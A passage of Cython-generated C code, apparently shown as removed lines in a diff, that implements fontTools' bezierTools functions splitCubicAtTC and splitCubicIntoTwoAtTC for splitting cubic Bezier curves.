numbers).\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_35splitCubicAtTC = {"splitCubicAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_35splitCubicAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_34splitCubicAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_35splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, 1); __PYX_ERR(0, 637, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, 2); __PYX_ERR(0, 637, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, 3); __PYX_ERR(0, 637, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "splitCubicAtTC") < 0)) __PYX_ERR(0, 637, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 637, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_CLEAR(__pyx_v_ts); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_34splitCubicAtTC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_34splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, PyObject *__pyx_v_ts) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubicAtTC", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 637, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_v_pt1 = __pyx_v_pt1; - __pyx_cur_scope->__pyx_v_pt2 = __pyx_v_pt2; - __pyx_cur_scope->__pyx_v_pt3 = __pyx_v_pt3; - __pyx_cur_scope->__pyx_v_pt4 = __pyx_v_pt4; - __pyx_cur_scope->__pyx_v_ts = __pyx_v_ts; - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_ts); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_ts); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_36generator, __pyx_codeobj_, (PyObject *) __pyx_cur_scope, __pyx_n_s_splitCubicAtTC, __pyx_n_s_splitCubicAtTC, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 637, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_36generator(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - __pyx_t_double_complex __pyx_t_8; - __pyx_t_double_complex __pyx_t_9; - __pyx_t_double_complex __pyx_t_10; - __pyx_t_double_complex __pyx_t_11; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicAtTC", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - case 1: goto __pyx_L6_resume_from_yield_from; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 637, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":657 - * Curve segments (each curve segment being four complex numbers). - * """ - * a, b, c, d = calcCubicParametersC(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * yield from _splitCubicAtTC(a, b, c, d, *ts) - * - */ - __pyx_t_1 = __pyx_f_9fontTools_4misc_11bezierTools_calcCubicParametersC(__pyx_cur_scope->__pyx_v_pt1, __pyx_cur_scope->__pyx_v_pt2, __pyx_cur_scope->__pyx_v_pt3, __pyx_cur_scope->__pyx_v_pt4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 657, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_4 = PyList_GET_ITEM(sequence, 2); - __pyx_t_5 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(__pyx_t_5); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_4,&__pyx_t_5}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_4,&__pyx_t_5}; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_7(__pyx_t_6); if (unlikely(!item)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 4) < 0) __PYX_ERR(0, 657, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 657, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_t_8 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_2); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_9 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_3); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_10 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_4); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_11 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_5); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_cur_scope->__pyx_v_a = __pyx_t_8; - __pyx_cur_scope->__pyx_v_b = __pyx_t_9; - __pyx_cur_scope->__pyx_v_c = __pyx_t_10; - __pyx_cur_scope->__pyx_v_d = __pyx_t_11; - - /* "fontTools/misc/bezierTools.py":658 - * """ - * a, b, c, d = calcCubicParametersC(pt1, pt2, pt3, pt4) - * yield from _splitCubicAtTC(a, b, c, d, *ts) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_splitCubicAtTC_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_a); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_b); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_d); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_5)) __PYX_ERR(0, 658, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_4)) __PYX_ERR(0, 658, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_3)) __PYX_ERR(0, 658, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_2)) __PYX_ERR(0, 658, __pyx_L1_error); - __pyx_t_5 = 0; - __pyx_t_4 = 0; - __pyx_t_3 = 0; - __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_6, __pyx_cur_scope->__pyx_v_ts); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_2, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __Pyx_Generator_Yield_From(__pyx_generator, __pyx_t_6); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_XGOTREF(__pyx_r); - if (likely(__pyx_r)) { - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - /* return from generator, yielding value */ - __pyx_generator->resume_label = 1; - return __pyx_r; - __pyx_L6_resume_from_yield_from:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 658, __pyx_L1_error) - } else { - PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); - if (exc_type) { - if (likely(exc_type == PyExc_StopIteration || (exc_type != PyExc_GeneratorExit && __Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration)))) PyErr_Clear(); - else __PYX_ERR(0, 658, __pyx_L1_error) - } - } - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - - /* function exit code */ - PyErr_SetNone(PyExc_StopIteration); - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC, "splitCubicIntoTwoAtTC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, double t)\nSplit a cubic Bezier curve at t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers.\n t: Position at which to split the curve.\n\n Returns:\n A tuple of two curve segments (each curve segment being four complex numbers).\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC = {"splitCubicIntoTwoAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - double __pyx_v_t; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicIntoTwoAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 1); __PYX_ERR(0, 661, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 2); __PYX_ERR(0, 661, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 3); __PYX_ERR(0, 661, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 4); __PYX_ERR(0, 661, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitCubicIntoTwoAtTC") < 0)) __PYX_ERR(0, 661, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_t = __pyx_PyFloat_AsDouble(values[4]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 661, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicIntoTwoAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = 